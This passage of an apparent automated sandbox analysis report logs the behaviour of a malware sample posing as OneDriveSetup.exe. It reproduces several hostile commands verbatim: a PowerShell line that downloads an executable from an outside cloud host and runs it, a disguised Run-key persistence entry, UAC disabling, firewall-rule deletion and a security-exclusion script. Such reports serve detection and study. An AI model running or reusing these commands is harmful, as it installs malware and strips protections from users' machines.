                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_10006875 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10006875
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D0CA214 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_6D0CA214
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_10006875 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_10006875
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_100085E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_100085E7
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: amsi64_4496.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: OneDriveSetup.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\Public\Videos\download_and_run.bat, type: DROPPED
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_100057A0 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,9_2_100057A0
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "Jump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250413054815\1.bat" "Jump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Videos\bin.exe "C:\Users\Public\Videos\bin.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=letsJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exeJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exeJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPROJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPNJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" checkNetFramework
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe"
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: bin.exe, 00000017.00000003.1513635861.0000000002734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D0CA417 cpuid 9_2_6D0CA417
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: ___crtGetLocaleInfoEx,GetLocaleInfoW,9_2_00662B2B
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: EnumSystemLocalesW,9_2_0082B3B7
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetLocaleInfoW,9_2_00662EB9
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoEx,GetLocaleInfoW,9_2_6CF10FC1
                Source: C:\Users\user\Desktop\OneDriveSetup.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Videos\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeQueries volume information: C:\Program Files (x86)\letsvpn\driver\tap0901.cat VolumeInformation
                Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.cat VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Utils.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\log4net.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNDomainModel.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Newtonsoft.Json.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\CommunityToolkit.Mvvm.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Memory.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Buffers.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNInfraStructure.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Analytics.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Crashes.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.batteries_v2.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.core.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.provider.dynamic_cdecl.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.nativelibrary.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Hardcodet.Wpf.TaskbarNotification.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\PusherClient.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\WebSocket4Net.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SuperSocket.ClientEngine.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Http.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLite-net.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Users\user\Desktop\OneDriveSetup.exeCode function: 0_2_0000000140017270 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0000000140017270
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0082CFA7 GetTimeZoneInformation,9_2_0082CFA7
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CEF8290 __EH_prolog3_GS,GetCurrentThread,GetCurrentThreadId,GetVersionExW,9_2_6CEF8290
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                Source: C:\Windows\System32\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
                Source: svchost.exe, 00000007.00000002.3069218145.000001A2A8902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                Source: svchost.exe, 00000007.00000002.3069218145.000001A2A8902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
                Source: OneDriveSetup.exeBinary or memory string: MsMpEng.exe
